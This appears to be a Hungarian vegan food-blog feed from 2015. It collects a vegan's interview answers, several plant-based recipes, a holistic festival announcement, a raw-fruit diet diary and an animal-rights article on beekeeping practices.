Nem igazán jut eszembe semmi. Úgy hiszem, elég tájékozott vagyok már ahhoz, hogy fenntartsam ezt az életmódot gond nélkül, hacsak nem jön közbe valami egészségügyi dolog.
Mi volt a legvisszatetszőbb, amivel találkoztál a vegán propagandában?
Amíg információkat gyűjtöttem, találkoztam és megismerkedtem rengeteg kedves és segítőkész vegánnal, de voltak olyanok, akik nagyon szigorú vegánok, és ráerőszakolják másokra a véleményüket. Személyesen még nem találkoztam ilyennel, ám a Facebook csoportokban, pl. a Vegan in Hungaryben igen, de egyszerűen letiltottam őket, és már nem zavar. Etikai, egészségügyi, vallási példával is találkoztam már, de volt olyan, aki Hitlerhez hasonlította a húsevőket.
Nem mondanám hogy emiatt kicsit is meggondolhattam volna magam, mert legfőképp az állatok miatt csinálom. Úgy gondolom, teljesen igazságtalan tömegesen lemészárolni őket úgy, hogy közben van, amikkel meg kivételt tesznek, és felháborodnak, ha megeszi őket valaki.
Mi a különbség az előzetes gondolataid és a gyakorlat között a vegán életedben?
Hamarabb is el tudtam volna kezdeni a vegán életmódot, de tartottam attól, hogy nem fog sikerülni rendesen. Igazából a vegán étkezés könnyebb, mint hittem, a teljes vegánság viszont nehezebb.
Köszönöm szépen az interjút!
Mustáros krumplifőzelék spárgával
2015. május 15. Dulmina tündérkonyhája
Olyan egyszerű, hogy a címben szinte benne a recept - de annyira ízlett, hogy nem akarom, hogy feledésbe merüljön következő spárgaszezonig. Meghámoztam és felaprítottam bő fél kilónyi krumplit, és annyi enyhén sós vízben, amennyi épp ellepte, feltettem főni. Közben megtisztítottam és feldaraboltam fél csomag zöld spárgát, külön gyűjtve a csúcsokat. Amikor a krumpli már kezdett puhulni, akkor
Narancsos édesburgonyás fetás zöld saláta, és Hollandia narancssárgában (gluténmentes)
narancsos édesburgonyás fetás zöld saláta (gluténmentes) Egy kicsit ugyan megkéstem ezzel a hírrel az idei évre, de jövőre még érdekes úti cél lehet azoknak, akik szeretik a szabadtéri mulatságokat, szeretik érezni egy nemzet összetartozását, és sokszínűségét egyszerre. Ahogy már korábban bemutattam, minden év Március 17-én Írország illetve egyéb országok ír közösségei zöldbe öltöznek, és így ünneplik a Szent Patrik napot, a világ minden táján. :-) Azonban nem csak az íreknek van színhez kötött ünnepük. Minden év április utolsó hétvégéjén, Queens day-en (ma már King's day), Hollandia narancssárga színbe borul! Narancssárga dekorációkkal, ételekkel, italokkal, narancssárgára festett hajjal, és ruhákban ünneplik a királynő / király születésnapját. Volt szerencsém mindkét ünnepet testközelből átélni, és hatalmas ereje van annak a szeretetnek, amit ilyenkor lehet érezni az utcákon. Az emberek ítéleteiket és különöbző nézeteiket félretéve ünneplik az országukat, egymást, és a földet, amin élnek. Hálásak, boldogok, és még látványosak is az egyforma színbe öltözött emberek tízezrei. :-) A korábbi királynő nappal ellentétben, a királyi családban történt változások miatt, 2014 óta egy férfi ül a trónon, és azóta a király napját, King's Day-t ünnepelnek Április 27-én a Holland Királyságban. "Koninginnedag (A királynő napja) - Április 30. A királynő napja hivatalosan az anyakirálynő születésnapját hivatott ünnepelni, de a valóságban ez csak egy indok egy hatalmas bulira. Egész Hollandia ünnepel, de különösen a nagy városokban -mint például Amszterdam, Rotterdam és Hága- indul be az élet ilyenkor. A város minden pontján buliba ütközünk, hangosan szól a zene mindenhol, mindenki narancssárgába van öltözve (ez a királyi család színe) szabadtéri koncerteket, előadásokat rendeznek. Amszterdamban kétségtelenül ez a legnagyobb szabású szabadtéri rendezvény, mintegy 750. 000 résztvevővel. A központban a Dam, Damrak, Rokin, Rembrantplein, Spui, Leidsestraat, Leidseplein környékén csak úgy hömpölyögnek az embertömegek." Forrás: http://www.amsterdam.info Ezen a napon az országban mindenfelé szabadon, engedélyek és adófizetés nélkül, lehet árusítani a használt holmikat. Az egész ország egy nagy bolhapiaccá változik egy napra, telis tele értékes és értéktelen lomokkal. Ha időben érkezünk, izgalmas kincsekre lelhetünk! ;-) Mint ahogy korábban az ír zöld napról, zöld menüsorral emlékeztünk meg ezen a blogon, úgy most a narancssárga nap tiszteletére, narancssárga menüsort készítettem nektek! Remélem tetszeni fog! :-) De előbb nézzük, mit is kell tudni a narancssárga színű ételekről? "Narancssárga és a béta-karotin: ,,Fiatalon tart A narancssárga zöldségek és gyümölcsök a béta-karotinnak, vagyis az A-vitamin provitaminjának természetes forrásai. Ennek köszönhetik narancsos árnyalatukat. A szervezetben lévő megfelelő mennyiségű karotin megvédi sejtjeinket a szabad gyökök roncsoló hatásától és a káros UV-sugárzástól, segíti a szép barnulást, lassítja a bőröregedést. Érdemes hát gondoskodni arról, hogy állandóan elég karotin tartalmú ételt fogyassz, mert nagyrészt ennek az anyagnak köszönhetjük szépségünket, fiatalságunkat. A karotin antioxidánst tartalmazó zöldségek és gyümölcsök hatását C vitaminnal együtt még jobban fokozhatod." Forrás: http://impressmagazin.hu Leggyakoribb narancssárga ételek pl.: sárgabarack, sárgadinnye, mangó, sütőtök, sárgarépa, narancs, mandarin. És akkor nézzünk néhány narancssárga ételt, amit az asztalunkra rakhatunk, ha béta-karotinra, azaz fiatalságra vágyunk! :-) reggelire: friss és energiadús "karotin bomba", a trópusi ízvilágú turmix (ananász, sárgarépa, lime, narancs, víz) tízóraira: magyaros tahini, azaz magyaros ízű szezámmag krém (mindenmentes, vegán) ebédre: - mandarinos gyömbéres sárgarépa krémleves (mindenmentes, vegán) - sütőben sült édesburgonyás sárgarépa fasírt, uborkás kuszkusszal (mindenmentes, vegán) - házi készítésű mangós jégkrém (mindenmentes, vegán édesség) nassolni való: narancsos sütőtökös diós kuglóf (glutén-, tojás-, és laktózmentes édesség) narancsos sütőtökös diós kuglóf vacsora: egy könnyed, friss, tápanyagban gazdag Narancsos édesburgonyás fetás, zöld saláta (gluténmentes) HOZZÁVALÓK: (2 személyre) - friss spenót levelek (vagy sötét zöld saláta levél keverék) - 1 nagyobb édes burgonya (vagy sütőtök) - 2 db édes narancs - 4 szem érett koktél paradicsom - 1/2 fej nyers lila hagyma - tetszés szerinti mennyiségben Feta sajt - 1 db érett avokádó - 2-3 szem friss retek - 1 marék pekán dió - 1 nagy marék sós mag: tökmag, naraforgómag, fenyőmag - tetszés szerint: csíra, sörélesztő pehely, kendermag ELKÉSZÍTÉS:Az édesburgonyát (vagy szezontól függően sütőtököt), meghámozzuk, kb.2*2 cm-es kockákra vágjuk, és előmelegített sütőben 220°C fokon aranybarnára sütjük, majd hagyjuk kihűlni. A zöldségeket (retek, paradicsom, lila hagyma, avokádó) és a narancsot feldaraboljuk tetszés szerinti méretben és formában. Elővesszük a két tányért, amikre a salátákat kiszeretnénk tálalni. Alulra helyezzük a spenót vagy zöld levél mix réteget. Rászórjuk a feldarabolt zöldségeket, fetát, a kihűlt édesburgonyát, a marék pekán diót és sós magokat, tetszés szerint csírát. Majd egy narancs frissen facsart levével megöntözzük a salátákat. És kész is az egyszerű és könnyű vacsoránk! :-) Tápanyagban gazdag Jó étvágyat kívánunk! ;-) Megjegyzés1: Természetesen nem tanácsos ezt a narancssárga menüsort pontosan így végig enni. Ezek az ételek csak ajánlások, a Zöld Avocado gasztroblog receptjei közül, a narancssárga szín jegyében. Megjegyzés2: A képek még az őszi sütőtök szezonban készültek, ezért sütőtököt használtam a salátához. Most tavasszal, nyugodtan használjunk édesburgonyát, mert ugyanolyan finom lesz.
Magyaros csicsókakrém
Ma kóstoltam ilyent életemben először, és annyira ízlett, hogy itthon tüstént el is készítettem.
Végre egy valóban finom, ehető, élvezhető csicsóka recept, amiben a csicsóka tipikusan földes íze nem dominál.
Az eredeti recept, amit persze lehet variálni vegánsághoz és nyersevőséghez mérten, következő verzió nálam is egy napraforgómagból, és kesudióból kutyult változat lesz a sajtos helyett.
Hozzávalók: 50 dkg csicsóka, 20 dkg natúr vagy tejszínes sajtkrém, 3 evőkanál tejföl, 2-3 gerezd fokhagyma, fél fej vöröshagyma vagy 1 újhagyma, 1 evőkanál mustár, 2 púpozott teáskanál édesnemes őrölt pirospaprika, 1 kiskanál őrölt kömény, só, bors, petrezselyemzöld, ízlés szerint egy kevés erős darált paprika.
Elkészítés: A csicsókát megtisztítjuk, és sós vízben megfőzzük. Amikor kihűlt, külső részét lehámozgatjuk, majd a belsejét villával pürésítjük. Hozzáadjuk a krémsajtot, a tejfölt, a mustárt, majd az apróra vágott fokhagymát, vöröshagymát/újhagymát. Ízesítjük pirospaprikával, őrölt köménnyel, sóval, borssal és kevés erős darált paprikával (kihagyható). Végül apróra vágott petrezselyemzöldet adunk hozzá. Az egészet jól elkeverjük, és 2-3 órára hűtőszekrénybe tesszük, hogy az ízek jól összeérjenek.
forrás: nakicsicsoka.hu reklámprospektusa
Lehet kenyérre kenni, vagy karikákra vágott cukkini karikákra, krékerekre.
Napfényes Fesztivál
Június első vasárnapján immár 12. alkalommal rendezik meg a Napfényes Fesztivált. Ezen alkalomból a szervezők először tartottak sajtótájékoztatót, hogy minél több emberhez, érdeklődőhöz eljusson a fesztivál híre. Az eseménynek az újonnan megnyílt csodás, végre nevéhez hűen Napfényes Étterem adott helyszínt, ízelítőt adva az étterem kínálatából is.
A Fesztivál szervezői mindenkire gondoltak: egész nap izgalmas előadások és különleges koncertek, vidám szabadtéri gyermek- és felnőtt programok, valamint kézműves és biovásár várja a látogatókat. Az önismereti módszerek és alternatív terápiák iránt érdeklődők pedig 24-féle workshop és 35-féle egyéni természetgyógyászati konzultáció palettájáról választhatnak kedvükre valót, hogy kipróbálják azt.
A nagyszínpadon idén is Magyarország legnevesebb holisztikus szemléletű szakemberei osztják meg bölcs gondolataikat a közönséggel az élet legfontosabb és mindannyiunkat érintő kérdéseiről: prof. dr. Bagdy Emőke pszichológus és pszichoterapeuta, Boldizsár Ildikó meseterapeuta, Tarr Bence László filozófus, kulturális antropológus és Váradi Tibor vallásbölcsész, természetgyógyász előadásai hangzanak el. A lelki-szellemi témájú előadások között különleges zeneélmények várják a fesztiválozás közben kicsit megpihenni vágyókat. A sztárvendégek Malek Andrea és Sasvári Sándor énekesek és Kövi Szabolcs fuvolaművész lesznek. A fesztivál záróakkordja a Misztrál együttes különleges koncertje lesz. A szabadtéri színpad a gyermekeké lesz. Itt varázslatos bűvészek, bábosok, zenészek és színészek szórakoztatják a legkisebbekből álló nagyérdeműt. Sok előadás interaktív, a nézők maguk is alakíthatják a műsort.
Ezeken kívül a programot gazdagítja önismereti utca, festősátor, meseösvény, zenesátor, zsonglőrsátor, kézműves sátor, társasjátéksátor, hagyományok sátra, környezetvédelmi sátor és dúlasátor. Azt hiszem mindenki könnyen meg fogja találni a számára legfontosabbat, legérdekesebbet.
Egy fesztiválon nem utolsó szempont a gasztronómia sem. Az ínycsiklandozó, tisztán növényi eredetű, vegán ételekről a Napfényes Étterem és Cukrászda fog gondoskodni, ahol a hagyományos ízek kedvelői és az új ízeket felfedezni vágyók egyaránt megtalálhatják majd számításaikat.
Ajánlom mindenkinek szeretettel a fesztivált, ha igazi kikapcsolódásra vágyik, itt tényleg minden a testi-lelki-szellemi egészség jegyében fog zajlani. Érdekesség, hogy a Petőfi Csarnok valószínűleg utoljára telik most meg élettel. A fesztivállal lényegében búcsúzik a több évtizedes múltú rendezvényközpont. Lezárul egy korszak, jövőre új helyszínen várja vendégeit a Napfényes Fesztivál.
Időpont: 2015. június 7., vasárnap
Helyszín: Petőfi Csarnok (1146 Budapest, Zichy Mihály út 14.)
Még több információ: a fesztivál weboldalán és Facebook oldalán.
***
Fotó kredit: Napfényes Fesztivál
A második születésnapi torta
Noha itt a spárga és az eper szezon, most nem egy ilyen recepttel/bejegyzéssel jövök, hanem a szívemhez sokkal közelebb állóhoz. Április 30-án Ádi két éves lett! Hihetetlen, hogy elrohant az idő! Emlékszem még az első mérföldkőre – számomra, az első születésnap mérföldkőt jelentett -, nemrégen volt, most meg már ünnepeltük a másodikat. Gondolom ez így lesz a többivel is… rohan az idő, de a legfontosabb, hogy minőségi “tartalommal” és sok-sok kacagással megtöltsük.
A második születésnapi torta alapreceptje innen származik. Vegán banános, diós. Változtattam a liszt fajtáján, adtam hozzá darált mandulát is és külön csináltam hozzá egy csoki öntetet (ami most nem karobbal készült, hanem nyers kakaóporral). Egy egyszerű, de gazdag baba- és kisgyerek barát torta lett. Ádi nem igazán édesszájú. Noha megevett belőle egy vastag szeletet, többet nem kért. A család felnőtt tagjai áradoztak, hogy mennyire finom volt a torta, szóval, ha rájuk hallgattok, kipróbáljátok!
Boldog születésnapot kisfiunk! Nagyon-nagyon szeretünk téged! Anya és Apa
“Kettő éves lettem!”
“Szemügyre veszem, anya mit sütött nekem…”
“Nyamm!”
Vegán banános-diós torta csokoládé öntettel
Hozzávalók:
Tortához (18-20 cm-es kapcsos formához):
– 3 db érett banán, villával pépesre törve
– 1 bögre dió, durvára aprítva
– 1 bögre tönköly fehérliszt
– 1/2 bögre darált mandula
– 1/2 bögre hajdinaliszt
– 1/4 bögre mandulatej (rizs-, szója-, zabtej is használható)
– 6 evőkanál kókuszolaj (olvasztva)
– 6 evőkanál juharszirup (rizs-, agavé-, datolyaszirup és méz is használható)
– 1 teáskanál sütőpor
– 1 teáskanál szódabikarbóna
– 1/2 teáskanál só
– 1 vaníliarúd kikapart magjai
A csokoládékrémhez:
- 50-60 ml juharszirup
- 40 g kókuszzsír
- 20 g kakaópor/karobpor, szitálva
- 1 evőkanál mandulavaj
- csipet só
A sütőt melegítsük elő 180C fokra. A kapcsos formát kenjük ki egy kis kókuszzsírral, és szórjunk bele egy kevés lisztet és rázzuk össze úgy, hogy az oldalára is jusson a lisztből.
Egy tálban keverjük össze a száraz hozzávalókat: tönkölyliszt, darált mandula, hajdinaliszt, sütőpor, szódabikarbóna, só. Egy másik tálban keverjük össze a pépesre tört banánt a mandulatejjel, a kókuszolajjal, a juharsziruppal és a vaníliával. A nedves hozzávalókat, öntsük a szárazhoz, jól keverjük el, majd adjuk hozzá az aprított diót. Ezt a tésztát öntsük bele az előkészített formába, tegyük a sütőbe és süssük kb. 45-60 percig. Tűpróbával ellenőrizzük, hogy átsült-e! Hagyjuk a formában kihűlni.
A csokoládékrémhez egy lábasban melegítsük át a juharszirupot, a kókuszolajjal, a mandulavajjal és a kakaóval. A tűzhelyről levéve adjuk hozzá a csipet sót. A langyosra hűlt krémmel
3 hónapja nyers
2015. május 1. Sose mondd, hogy soha
Hol is kezdjem... ? Tavaly ilyenkor, amikor tájékozatlan és gyakorlatlan kezdőként botladoztam, zavart, hogy túl sok időt és energiát igényel ez a fajta étkezés. Nem akartam, hogy a napjaim fele a kajálásról szóljon, annyi más dologra kell idő és energia. Most így 3 hónap stabil nyerskoszt után pont az ellenkezőjét érzem (végre!): teljesen háttérbe szorult az életemben az étkezés. Rutinból megy, nem figyelek már rá, és így jóval több energiám marad más dolgokra. Mert annyira egyszerű, letisztult étkezés ez! Nagyon szeretem! Napi rutin: Reggel megcsinálok kb 3 liter gyümölcsturmixot magamnak és ugyanannyit Daninak is, ennek hozzávalói változóak, de alapvetően: banán, datolya, spenótlevél, alma, körte, mangó, piros gyümölcsök változatosan. Bepakolok egy dobozkába rágcsálnivalót napközbenre: datolya, aszalt szilva, dió, néha áfonya is. Este pedig nagy adag paradicsomos saláta napraforgótejföllel, néha uborkával, paprikával, sok-sok zöld levéllel. Korábban sosem volt sikerélményem a konyhában. Tehetségtelennek bizonyultam a főzésben, sütésben. Valahogy sose éreztem az arányokat és ahhoz meg nem volt elég önfegyelmem, hogy precízen lekövessek egy receptet. Most viszont folyton sikerélményem van: szuperek a turmixok és a saláták, amiket összedobok. Pedig nem nagyon figyelek oda, csak úgy simán tök jók és kész. Sokkal egyszerűbb, természetesebb így és élvezem is! Biztos, hogy drágább ez így, mint egy átlag otthon főzős vegán étrend. De az is biztos, hogy nem költök gyógyszerre, fájdalomcsillapítóra, arckrémre, dezodorra és még egy sor másra. Ha megkérdezed az embereket, mi a legfontosabb, 90%-ban azt mondják, az egészség. De mégis csodálkoznak, ha valaki erre költ a legtöbbet. Én nem szoktam az egészséget a legfontosabbnak tartani. Szerintem a legfontosabb az őszinteség, a bátorság, az együttérzés. De ezek nem kerülnek pénzbe. Az egészség igen. Ez van. Továbbra is minden egyes nap újra és újra nemet mondok a csábító főtt ételekre. Nap mint nap újra és újra meg kell hozni a döntést. Szinte látom magam előtt a mérleget ilyenkor, aminek egyik oldalán az élvezet ücsörög (falafel,növényi sajt, növényi tejszín, pizza, hambi, lasagne, spenótos penne, sütik hada... - avagy Kozmosz, Hummusz bár, sarki falafeles, Édes Élet cuki, Napfényes étterem...) , a másik oldalon pedig mindaz, amit tanultam és főleg amit megtapasztaltam a gyümölcsevésről. Nem jó szó az, hogy ,,nemet mondok. Nem mondok semmit. Nem próbálom elnyomni magamban a vágyat. Hagyom, hogy legyen és magától elmúlik idővel. Nem fordítom el a fejemet az ételektől, amik mellettem illatoznak, sőt, belélegzem az illatukat és élvezem. Hagyom, hogy a vágyakozás megszülessen és elhamvadjon bennem. Már három hónapja beválik. Tavaly ilyenkor ugyanígy meg volt a mérleg, csak nem volt még annyi tapasztalat a jobb oldali serpenyőben. Így most már lazán lenyomja. Vágyom az élvezetre, de nem vágyom arra, amit utána érzek a testemben. Aki nem próbálta még tartósan a gyümölcsevést, el sem tudja képzelni, mennyire könnyedén, tisztán is érezheti magát az ember. Elindulok futni és alig tudom abbahagyni, reggel magamtól ébredek óra nélkül, nem kell se kávé, se tea. Sőt, igazából vizet inni sem szoktam, mert a gyümölcsök bőven eléggé hidratálnak. Szeretném elmondani mindenkinek, hogy ez milyen jó így. De közben tudom, hogy milyen nehéz volt az átállás és sok embert ismerek, aki elkezdte és útközben visszafordult. Szeretném megtalálni a módját, hogy segíthessek másoknak. Holnap, ha minden jól megy, elkezdem a videóblogot receptekkel!
Datolya kabátban, illetve lekváros bukta
Az első változat hirtelen ötletből készült, és maradék tésztából. A Fiatalember miatt, aki aztán megeszi külön a datolyát, külön a tésztát. Egyben való fogyasztásával ne riogassam. :) Most egy kicsit változtattam a tésztán. Bukta készült, de a hagyományos tésztába némi olajos mag is került. Nem sok, de éppen arra jó, hogy hozza a kellemes aromát. A hozzávalók kb. 12 kisebb buktához, és egy tepsi datolyás kiscsigához elegendők. Hozzávalók: 60 dkg liszt (kb. 30 dkg tk, 30 dkg fehér) 20 dkg kókuszzsír 10 dkg dió 10 dkg gyümölcscukor / eritrit / nyírfacukor kb. 300 ml növényi tej 1/2 tk só 2 dkg élesztő szilvalekvár / magozott datolya A száraz hozzávalókat összekeverjük, majd a kókuszzsírt beledolgozzuk. 1 dl cukros tejben felfuttatjuk az élesztőt, majd beleöntjük a tésztába és gyúrni kezdjük. Folyamatosan adagoljuk a tésztához a folyadékot attól függően, hogy a liszt mennyit vesz fel. A teljes őrlésű lisztek mindig többet. Kissé lágy, de rugalmas tésztát kell kapjunk. a) A buktákhoz kb. félujjnyi vastagra nyújtjuk a tésztát, ráhalmozzuk a lekvárt, formázzuk, a széleket aláhajtjuk. b) A datolyás kiscsigához a tésztát vékonyra nyújtjuk. Ha szeretjük a nagyon édeset,tehetünk bele egész datolyákat, de számomra az túl tömény volt, így feleztem. A datolya hosszának megfelelően vékony csíkokat vágunk a tésztából (kb. 3-4 cm) és a szélétől elkezdjük a datolyát beletekerni. Másfél, két fordulat után elvágjuk tepsibe vele, jöhet a következő... Ha ferdén vágjuk kicsit a tésztát, mutatósabb csigákat kapunk. Bő fél órát kelesztjük. (A csiga a hűtőben pihent egy órát, míg a bukta sült, bírja.) Közepes hőfokon 25-30 perc alatt sütjük.
A Föld Világnapja és a Csoki krémes szőlő torta, zöld tésztával (glutén- és laktózmentes) (zöld menüsor Szent Patrik napon 4.rész)
2015. április 23. Zöld Avocado
Tegnap, 2015. Április 22-én ünnepelte a 25. évfordulóját a magyarországi Föld napja mozgalom, és ez a 45. évfodulója volt a Föld napja világmozgalomnak ! :-) Ezt megünnepelvén hoztam nektek egy nagyon látványos és finom torta receptet, telis tele mindenféle "földi jóval". ;-) csoki krémes szőlő torta, zöld tésztával De előbb egy kicsit arról, mi is az a Föld Napja?! "Az első Föld napján, Denis Hayes amerikai egyetemista kezdeményezésére, 1970. április 22-én 25 millió amerikai emelte fel szavát a természetért. Ez a történelmi jelentőségű esemény az Egyesült Államokban - és az ország határain túl is - fontos változásokat hozott: az USA-ban szigorú törvények születtek a levegő és a vizek védelmére, új környezetvédő szervezetek alakultak, és több millió ember tért át ökológiailag érzékenyebb életvitelre. 1990-BEN VILÁGMOZGALOMMÁ VÁLT, és MAGYARORSZÁG AZ ELSŐK KÖZÖTT CSATLAKOZOTT. A kezdettől, 1970-től 2010-ig eltelt 40 évben a Föld napja világméretű megmozdulássá vált: több mint egymilliárd ember vesz részt valamilyen környezeti eseményen ezen a napon. A nemzetközi Föld Napja Hálózat 174 országban több mint 15 000 szervezettel dolgozik azon, hogy kialakítsák "az egyetlen eseményt, amelyet az egész világon egyszerre ünnepelnek, mindenféle származású, vallású és nemzetiségű emberek". Forrás: Föld Napja Alapítvány csoki krémes szőlő torta, zöld tésztával A Föld Napja Alapítvány meghirdette az évi egy helyett, a heti egy Föld napját, hogy egymást segítve váltsunk egy hosszú távon fenntartható életmódra! Mik is ezek a kihívások, melyek közül te is könnyedén választhatsz és megvalósíthatsz egyet, kettőt, vagy akár többet is??? 1.heti kihívás: Pihentesd a kocsit. Hetente legalább 3-szor mondj le az autóról, és helyette gyalogolj, bringázz, rollerezz vagy tömegközlekedj! 2.heti kihívás: Kisebb ökológiai lábnyom, heti 1 húsmentes nappal! 3.heti kihívás: Légy klímabajnok heti 3 vegán nappal! 4.heti kihívás: Éheztesd a kukát! (kevesebb ételt a kukákba) 5.heti kihívás: Komposztálj! 6.heti kihívás: Ne fogadj el nejlonzacskót a boltokban! Vászontáska, kosár, textiltasak... 7.heti kihívás: Igyál csapvizet, palackozott helyett! 8.heti kihívás: Használj környezetkímélő tisztítószereket! 9.heti kihívás: Kevesebb élelmiszer-kilométer: vegyél helyi termékeket, támogasd a helyi farmereket! 10.heti kihívás: Ültess haszonnövényeket! Bővebben a kihívásokról és arról, hogy hogyan tudjuk élhetőbbé tenni a bolygónkat, itt olvashattok: http://fna.hu/mittehetsz/hetikihivas csoki krémes szőlő torta, zöld tésztával És akkor vissza a recepthez... Habár jelenleg egyáltalán nincs szőlő szezon, és ez a szőlős torta egy másik, korábbi jellegzetes ír napra készült, amikor minden étel zöld színű volt nálunk, azért mivel már régóta ígérem, hogy megosztom veletek ezt a receptet, úgy gondoltam nem bánjátok, ha egy kicsit összekötöm a különböző eseményeket egy bejegyzésben. :-) A nyers csoki krémes szőlő tortának nem csak a dekorációja, de a tésztája is zöld színű. A krém pedig egy nyers csoki krém, ami tökéletesen kiegíszíti a szőlő ízét. A kivis és a szőlős torta között dilemmáztam, és végül ez lett belőle. :-) És, hogy hogyan is lehet egy süti tészta zöld színű egészségtelen mesterséges színezék nélkül??? Erre több válasz is lehetséges. Manapság elég sok receptet látni, ahol japán Matcha teával színezik a süteményeket. Egészséges, finom és igen szép zöld színt lehet kapni végeredményül. Azonban elég drága hozzávaló, egy átlagos desszerthez. Gondolkoztam mi mást használhatnék helyette? Kutatgattam, keresgéltem, és végül a spenót mellett döntöttem! Spenót az édességbe? :-o Igen, spenót az édességbe. :-) Egyáltalán nem érezni a spenót levelek ízét a tésztában, és nagyon szépen, természetes módon megszínezték a torta lapokat. Ha nem mondom meg mi van benne, észre sem lehet venni. ;-) Hát akkor nézzük ezt az igen látványos, egészséges, könnyen emészthető. tápanyagban gazdag, de magas kalóriatartalmú, nem mindennapi tortát! :-) csoki krémes szőlő torta, zöld tésztával HOZZÁVALÓK: a torta laphoz: - 150 g kókusz liszt - 150 g mandula liszt - 1 tk szódabikarbóna - 1 csipet Himalája só - 120 g Xilit / nyírfacukor vagy nádcukor (porcukorrá darálva) - 2 bio tojás - 1 frissen facsart citrom leve és héja reszelve (kezeletlen héjú citrom) - 200 ml kókusz tej - 1 marék friss spenót levél kb.0,5 dl vízzel összeturmixolva a krémhez: - kb.50 szem zöld szőlő leturmixolva + szőlőszemek a dekoráláshoz - 3 db érett avokádó húsa - 2 db érett banán - 30 g kókusz olaj - 50 g karob por vagy jó minőségű cukrozatlan kakaó por - 1 ek útifűmaghéj csoki krémes szőlő torta, zöld tésztával ELKÉSZÍTÉS:A torta lap száraz és nedves hozzávalóit külön-külön összekeverjük, majd az egészet összeöntjük, és egyneművé keverjük. Elővesszük a kapcsos torta formánkat, és kikenjük kókusz zsírral. (Én sütőpapírral is ki szoktam bélelni, biztos ami biztos alapon.;-) ) A sütőt előmelegítjük 180 °C -ra, majd 35 perc alatt készre sütjük a torta lapot. Miután elkészült, hagyjuk kihűlni a formában, majd vágjuk ketté vízszintesen, hogy két lapot kapjunk. A krémhez turmixoljuk le az érett és nyers avokádókat a banánokkal. Majd keverjük hozzá az előre leturmixult szőlőt, a kókusz olajat, a karob port és az útifűmaghéjat. alaposan keverjük össze, majd a krém egyik felével kenjük meg a két torta lap közötti részt, majd a torta tetejét is. Friss, felkarikázott szőlőszemekkel díszithetjük a nyers csoki krémes tortánkat. Tegyük a hűtőbe 2-3 órára, majd fogyaszthatjuk is a rendhagyó, glutén- és laktóz mentes szőlős édességünket! csoki krémes szőlő torta, zöld tésztával Táplálkozz, ne csak étkezz! Megjegyzés1: Nem vagyok rutinos torta készítő, de most már tudom, hogy sokkal mutatósabb lenne ez a recept is, ha magasabb lenne a torta szelet, azaz, ha 4 lapot készítettem volna. Ezért legközelebb dupla adag tésztát készítek, és 4 felé vágom a megsült torta tésztát. :-) Megjegyzés2: Ha pedig szezonális torta receptre vágytok, akkor itt egy korábbi epres avokádó krémes torta recept a Zöld Avocado gasztroblogról.
Mézédes élet? - Haszonállatok a kaptárban
2015. április 20. La Veganista
A háziméhek haszonállatok, akárcsak a sertések vagy a szarvasmarhák. Az utóbbiak kihasználása mind átláthatóbbá válik, míg a méhekéről kevesebbet tudunk, noha termékeiket fogyasztjuk, profitszerzés céljából tenyésztjük, adjuk-vesszük, bizonyos esetekben megöljük őket. Miért vagyunk közönyösek a méhek szenvedése iránt? Csak mert rendszertanilag távol állnak tőlünk, nem indokolt, hogy kevesebb együttérzést mutassunk irántuk, mint egy orangután iránt.
A háziméhek magasan fejlett,komplex társadalomba szerveződnek.A kaptárak kisvárosnyi népessége szuperorganizmusként viselkedik, kollektív intelligenciával bír, és az embertől függetlenül képes fenntartani magát. Hatékonyan kommunikálnak feromonokkal, társas viselkedési formáik közül legismertebb a méhtánc. A kaptár helyzete, a nap járása, tereptárgyak, ízek, színek segítségével megalkotják környezetük kognitív térképét, ami alapján tudatos döntéseket hoznak.
A méhfélék több mint 20.000 fajtája ismeretes. A paleolitikum barlangrajzain már ábrázolták a mézrabló embert, de a háziasítás 6000 éve kezdődött. Ha a rovarok többségéhez hasonlóan a mézelő méhek nem termelnek mézet és más hasznosítható anyagokat, nem kerül sor a domesztikálásukra.
Ahogy a haszonállattartás más területein (pl. tojás, tejipar), itt is főként nőivarú egyedeket (a család 99%-a) zsákmányolnak ki, mivel ők állítják elő az ember által fogyasztott valamennyi méhterméket, melyeket nem tekintünk vegánnak. A méhek természetes táplálékául szolgáló méz elvételekor a feromon kommunikációt hideg füsttel blokkolják, így a méhésznek nem kell támadástól tartania. A rablás járulékos veszteségét a fölözéskor felszínre úszó méhtestrészek bizonyítják. Egyes méhészetek a méhpempőt is gyűjtik, ami az anyabölcsők kiürítését, a bennük lévő lárvák elpusztítását jelenti.
A méhpempő begyűjtése, az anyalárvák halálát jelenti
A potrohmirigyben termelődő méhviaszt, a kaptár tömítésére, fertőtlenítésére használt propoliszt, az immunrendszert erősítő, szaporodást segítő virágport is elveszik, akárcsak a méhmérget. A méreg kinyerése során az állatot gyenge áramütéssel szúrásra késztetik. Ha gumi hártyába szúr, elpusztul, ha műanyag vagy üveglap fogja fel a mérget, a rovar életben marad, és a procedúra 3-6 naponta ismételhető. A gyógyítás bizarr módja, a méhméreg terápia. A csipesszel megfogott, szúrásra kényszerített méh fullánkja és méregmirigye a potrohból kiszakadva a páciens bőrében marad, így az állat elpusztul.
A méhméreg terápia a méhekre nézve halálos
A dolgozó egész életében 0,6 g mézet gyűjt, 1 kg méz előállításához a kaptárlakók együttesen kb. 4.000.000 virágot látogatnak, 120.000 km-t tesznek meg, ezzel háromszor repülhetnék körbe a Földet
A méhtársadalom életébe a profitszerzés érdekében számos ponton beavatkoznak. A családok stressz szintjét növeli a fiasítások háromhetenkénti felülvizsgálata. A beteg kolóniákat elpusztítják, de a fertőzésgyanús kaptárakban termelt méz és viasz ipari felhasználásra még jó. Az álanyás családokat kiszórják a kaptárból. A gyenge családok anyáit megölik, és más kolóniákkal egyesítik. Létezik anya nélküli mézeltetés is, bár a családot legyengíti, sok és könnyen elvehető mézet jelent. Az anya elvesztése extrém stresszhelyzettel járó beavatkozás a méhcsalád életébe, amit a méhek ,,sírással, hangos szárnyrezegtetéssel jeleznek.
A királynőt megölni nem kell félnetek, jó lesz
A méhészek nem bízzák a véletlenre a tenyésztést, ami állománynövelést, tartalékcsalád képzést és eladást tesz lehetővé. Használhatnak saját nevelésű anyákat,vagy dajkacsaládokkal foglalkozó méhészetből érkező, anyazárkában raboskodó anyákat helyeznek a kaptárba. Vannak, akik a régi anya testét a zárka falára kenik,hogy a család elfogadja a ,,betolakodót. Az új anya speciális tulajdonságokat szelektáló laboratóriumból is származhat, ahol szén-dioxiddal kábított méhanyák mesterséges megtermékenyítésével foglalkoznak a heréktől begyűjtött spermával.
Inszemináció - mesterséges megtermékenyítés
